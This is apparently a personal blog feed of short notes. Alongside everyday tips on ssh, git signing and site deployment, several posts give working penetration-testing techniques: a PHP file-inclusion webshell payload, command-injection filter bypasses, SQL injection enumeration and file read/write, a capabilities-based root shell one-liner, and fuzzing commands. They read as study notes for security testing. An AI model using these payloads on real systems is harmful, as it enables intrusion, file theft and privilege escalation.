Notes on slightlymore

How to get keychain to remember ssh passphrase

Mon, 06 Apr 2026 00:00:00 +0000

ssh-add --apple-use-keychain --apple-load-keychain ~/.ssh/id_ed25519

References

How to set up git signing 🌿

How to get rid of YouTube shorts

Mon, 06 Apr 2026 00:00:00 +0000

There’s no global setting to remove YouTube shorts, but I’ve found that by saying “not interested” to every one which pops up they’ve been removed from my feed.

Right now I’m not sure how long this will be in effect for, but it’s at least a temporary solution.

Reverse the order of lines in a file

Mon, 06 Apr 2026 00:00:00 +0000

Reading and writing to the same file can in theory cause it to become truncated or corrupted so you can use sponge from moreutils to “soak up std out and write to a file” which ensures that the file is processed in entirety before redirecting the output back to the same file.

tail -r file.txt | sponge file.txt

Using PHP filters in local file inclusion

Sat, 24 Jan 2026 00:00:00 +0000

Imagine a PHP file where you can perform LFI such as

curl http://example.com/vuln.php?lang=en.php

With a badly configured server and app you can use PHP read filters to get the full content

curl http://example.com/vuln.php?lang=php://filter/read=convert.base64-encode/resource=en.php

You can get a webshell or RCE if allow_url_include is enabled

curl http://example.com?vuln.php?lang=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Cg==%3D%3D&cmd=whoami

The shell is <?php system($_GET['cmd'];

A string to test for template injection vulnerabilities

Sun, 11 Jan 2026 00:00:00 +0000

The following string can be used to test a large number of templating engines in one go:

$ { { < % [ % ' " } } % \ .

[!IMPORTANT] Remove the spaces between each character! I’ve included them here because it messes up rendering in some places!

Techniques for bypassing blocklist words for command injections

Thu, 08 Jan 2026 00:00:00 +0000

Inserting noop characters

Quotes (even number of non-mixed) will be ignored by bash. $ c'a't becomes $ cat. Similar for $ c"a"t

Backslashing chars (other than \n etc, obs) will have no effect. $ c\at becomes $ cat.

Use the positional param character $ c$@at becomes $ cat

Manipulate the characters

$(rev<<<'tac') becomes cat. Experiment with other things like rot13.

Encode the command

$(base64 -d<<<"Y2F0Cg==") becomes cat

Techniques for bypassing blocklisted characters for command injections

Thu, 08 Jan 2026 00:00:00 +0000

Whitespace

%0a: newline
%20: space
%09: tab
${IFS}: Input Field Separators ↗️ (typically space, tab, newline)
bash bracket expansion: {ls,-la} turns into ls -la

Special characters

forward slash: echo ${PATH:0:1}
semicolon: echo ${LS_COLORS:10:1}
pipe: try using <<<

Shifting characters

This command will shift a letter one to the right echo $(tr '!-}' '"-~'<<<[). e.g. ~ becomes !.

shift_generator() {
 local shift=$1
 local char=$2
 local second_start=$((33 + shift))
 local second_end=$((33 + shift - 1))
 printf "echo \$(tr '\\!-~' '"
 printf '%b-~\\!-%b' "$(printf '\\%03o' $second_start)" "$(printf '\\%03o' $second_end)"
 printf "'<<<'%s')\n" "$char"
}

# usage
shift_generator 1 "~"

Tooling

For more advanced obfuscation you can consider tools such as:

Enumerating databases, tables, columns, and user privileges with SQL injection

Sat, 03 Jan 2026 00:00:00 +0000

Using a UNION injection we can find out about a (MySQL/MariaDB) structure.

Here are some minimal examples. Remember to determine the correct number of columns 🌿 and match that. Also clearly remember to add WHERE clauses to these to narrow down the search.

Databases

UNION SELECT SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA;

Tables

UNION SELECT TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.TABLES;

Columns

UNION SELECT COLUMN_NAME,TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS;

Privileges

UNION SELECT GRANTEE, PRIVILEGE_TYPE FROM INFORMATION_SCHEMA.USER_PRIVILEGES

References

How to determine the number of columns for union SQL injection 🌿

Reading files with MySQL

Sat, 03 Jan 2026 00:00:00 +0000

After enumerating user privileges 🌿 if you find one which has FILE you can use that to read files from the target.

UNION SELECT LOAD_FILE('/etc/passwd')

References

SQL injection resources

Sat, 03 Jan 2026 00:00:00 +0000

Tools

sqlmap ↗️ has a --proxy flag

Pro tip: remember to use proxychains 🌿 to proxy to burp for tools without proxy flags!

Techniques

Writing files with MySQL

Sat, 03 Jan 2026 00:00:00 +0000

Prerequisites

This should not be enabled on any modern secure systems, but if it is, you can use it to create a remote shell.

secure_file_priv ↗️ can have the following values:

null: cannot write anywhere on system
"" (empty string): can write anywhere
"/path/to/dir": can write only to specified path

SHOW VARIABLES LIKE 'secure_file_priv';

You can get this by querying the information_schema using a union injection

UNION SELECT VARIABLE_NAME,VARIABLE_VALUE FROM INFORMATION_SCHEMA.GLOBAL_VARIABLES

Do it

SELECT "OOPS!" INTO OUTFILE "/var/www/html/poc.txt"

References

Enumerating databases, tables, columns, and user privileges with SQL injection 🌿

How to determine the number of columns for `union` SQL injection

Fri, 02 Jan 2026 00:00:00 +0000

A union injection causes additional rows to be added to the result set by using the UNION clause. To do this, we need to know the number of columns in the target result set.

There are two easy strategies for this. Using order by or union. Assume that the following is vulnerable:

SELECT * from users where username='$oops'

`order by`

In MySQL you can use numeric arguments for order by which you can use to infer the number of columns. Let $oops = "test' order by 1 -- then the query becomes:

XSS Payloads

Tue, 30 Dec 2025 00:00:00 +0000

Here are some resources containing XSS payloads:

Encoding and decoding with base64, hex, etc on command line

Mon, 29 Dec 2025 00:00:00 +0000

base64

echo 'test' | base64
echo 'dGVzdAo=' | base64 -d

hex

echo 'test' | xxd -p
echo '746573740a' | xxd -p -r

rot13

echo 'test' | tr 'A-Za-z' 'N-ZA-Mn-za-m'
echo 'grfg' | tr 'A-Za-z' 'N-ZA-Mn-za-m'

Javascript deobfuscation tools

Mon, 29 Dec 2025 00:00:00 +0000

unpacker ↗️ reverses jspacker. Signature eval(function(p,a,c,k,e,r)

References

Encoding and decoding with base64, hex, etc on command line 🌱

Fuzzing tools

Sat, 27 Dec 2025 00:00:00 +0000

Some example `ffuf` commands

In each case, FUZZ is the placeholder for word replacement.**

Fuzzing for specific extensions

ffuf \
 -w /usr/share/seclists/Discovery/Web-Content/common.txt \
 -u http://example.com/target_dir/FUZZ 
 -e .txt,.html,.bak # etc

Recursive fuzzing

ffuf \
 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \
 -u http://example.com/target_dir/FUZZ \
 -recursion

Fuzzing a `POST` parameter

ffuf \
 -w /usr/share/seclists/Discovery/Web-Content/common.txt \
 -u http://example.com/example.php \
 -X POST \
 -H "Content-Type: application/x-www-form-urlencoded" \
 -d "y=FUZZ"
 -ic

Fuzzing a `GET` parameter

ffuf \
 -w /usr/share/seclists/Discovery/Web-Content/common.txt \
 -u http://example.com/example.php?x=FUZZ \
 -ic

References

Brute forcing subdomain enumeration 🌿

Brute forcing subdomain enumeration

Wed, 10 Dec 2025 00:00:00 +0000

`dnsenum`

Performs various dns-level and osint searches to find sub domains.

dnsenum \
 --enum target.tld \
 -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt

`gobuster`

You can do virtual host subdomain brute forcing with gobuster. You can specify the target as a hostname or ip.

gobuster vhost \
 -u http[s]://targetip[:port] \
 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt \
 --append-domain

DNS Zone transfers with dig

Wed, 10 Dec 2025 00:00:00 +0000

You can do a DNS zone transfer using dig by using axfr

dig axfr @dns-server.com target.tld

This will return all dns records for target.tld. It’s intended to copy all records from a primary to secondary server and should only happen if trusted, but misconfigured servers may allow unauthorised transfers allowing for enumeration without brute forcing 🌿 .

Installing seclists on Kali

Wed, 10 Dec 2025 00:00:00 +0000

The seclists from https://github.com/danielmiessler/SecLists ↗️ can be installed on Kali using apt

apt install seclists

They’re installed into /usr/share/seclists/

Proxying cli traffic to burp suite using proxychains

Sat, 06 Dec 2025 00:00:00 +0000

proxychains ↗️ is a tool which forwards TCP traffic via a proxy. You run other applications via it. For example

proxychains curl www.example.com

The relevant part of config for HTTP traffic is in /etc/proxychains.conf

#socks4 127.0.0.1 9050 # comment this line out. TODO: Why?
# Add the following line
http 127.0.0.1 8080

This config forwards the traffic to a proxy on 8080 which is the default for burp. Change the setup as needed for other tools.

How to get a root shell using results from getcap

Mon, 01 Dec 2025 00:00:00 +0000

getcap is a program to get capabilities of others. The one which is a way in is cap_setuid

getcap -r / 2>/dev/null

If anything’s listed which lets you script, you can use that to get a shell. Here’s a Python example:

python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Colemak has been fun, but the experiment has failed

Thu, 27 Nov 2025 00:00:00 +0000

Just over a year ago I decided to bite the bullet and try out colemak. I’ve been at it full time on my Corne, by still using qwerty on traditional keyboards.

My findings:

makes me a vim noob
wpm has increased but plateaued because I want to retain qwerty memory
what has been a success is Corne
reflection: embrace qwerty and touch type on corne

Useful search engines

Thu, 27 Nov 2025 00:00:00 +0000

Meta search

Kagi ↗️ premium (paid for and ad-free) search prioritising privacy and user experience. Reminiscent of the good-old-days
SearXNG ↗️ self-hostable, open-source metasearch engine that aggregates results from 200+ engines. There are hosted versions but privacy or veracity is not guaranteed

Specialist

Virus Total ↗️ meta engine for checking files and their hashes against virus databases
Shodan ↗️ is an engine to find devices connected to the internet
Censys ↗️ searches hosts, IPs, certificates

Exploits and CVE databases

Planting the digital garden

Fri, 21 Nov 2025 00:00:00 +0000

After writing my notes on revamping the site 🌲 I’ve stumbled across the new idea of digital gardening as an alternative to blogging. It’s not actually that new, but it is to me.

What I like about it is how close it is to a Zettelkasten and how it allows for notes to be written and published in an unfinished state completely guilt-free. It reminds me of my first website all that time ago where there were pages which had nothing other than an under construction banner.

Deploying a Hugo site using Github Actions

Thu, 20 Nov 2025 00:00:00 +0000

I thought I’d share my github action which deploys this site whenever a push a new file to main. It compiles the site with hugo and the rsyncs across to the server.

This means that my workflow is:

fire up neovim and write
commit and push
sit back and wait for the site to update

The code for the action is below. It requires a couple of secrets to be set up:

About

Tue, 18 Nov 2025 00:00:00 +0000

This is yet another variation of a blog by me, Clinton. I am a software engineer working and living in Bath, UK. The goal (this time) is to be somewhere between a blog and a zettelkasten where I’ll ramble, write some articles, but also share short facts, notes, and resources.

The content here is written by me (by which I mean, not AI.) I may use AI to help to plan articles but words will be my own. In fact, as an act of transparency, I’ll add Claude (or whatever) as a co-author and expressly note the input if I do use AI for anything anywhere.

Tap tap, is this thing still on?

Sat, 15 Nov 2025 00:00:00 +0000

This website has been in a bit of a dilapidated state since, well, COVID really. Things have moved on a lot since then and I’d like to make a new start.

Rather than do what I’ve done before and try to recover the site as it was and create a new theme for wordpress and whatnot, I’m redoing everything and hoping that’ll help. This time it’s just going to be a load of articles, thoughts, nonsense, and loosely based on the idea of a Zettelkasten which is something which I have had a lot of success with over the last few years using Obsidian. Hopefully it’ll feel informal enough that I’ll not feel pressure and just, you know, write.

How to set up git signing

Tue, 03 Sep 2024 00:00:00 +0000

Generate SSH key with passphrase (ssh-keygen)
Get keychain to remember passphrase ssh-add --apple-use-keychain --apple-load-keychain ~/.ssh/id_ed25519
Tell git to use SSH for signing: git config --global gpg.format ssh
Tell git about the key git config --global user.signingkey ~/.ssh/id_ed25519.pub
Auto sign commits git config --global commit.gpgsign true

References

How to get keychain to remember ssh passphrase 🌿

Notes on slightlymore

How to get keychain to remember ssh passphrase

References

How to get rid of YouTube shorts

Reverse the order of lines in a file

Using PHP filters in local file inclusion

A string to test for template injection vulnerabilities

Techniques for bypassing blocklist words for command injections

Inserting noop characters

Manipulate the characters

Encode the command

Techniques for bypassing blocklisted characters for command injections

Whitespace

Special characters

Shifting characters

Tooling

Enumerating databases, tables, columns, and user privileges with SQL injection

Databases

Tables

Columns

Privileges

References

Reading files with MySQL

References

SQL injection resources

Tools

Techniques

Writing files with MySQL

Prerequisites

Do it

References

How to determine the number of columns for `union` SQL injection

order by

XSS Payloads

Encoding and decoding with base64, hex, etc on command line

base64

hex

rot13

Javascript deobfuscation tools

References

Fuzzing tools

Some example ffuf commands

Fuzzing for specific extensions

Recursive fuzzing

Fuzzing a POST parameter

Fuzzing a GET parameter

References

Brute forcing subdomain enumeration

dnsenum

gobuster

DNS Zone transfers with dig

Installing seclists on Kali

Proxying cli traffic to burp suite using proxychains

How to get a root shell using results from getcap

Colemak has been fun, but the experiment has failed

Useful search engines

Meta search

Specialist

Exploits and CVE databases

Planting the digital garden

Deploying a Hugo site using Github Actions

About

Tap tap, is this thing still on?

How to set up git signing

References

`order by`

Some example `ffuf` commands

Fuzzing a `POST` parameter

Fuzzing a `GET` parameter

`dnsenum`

`gobuster`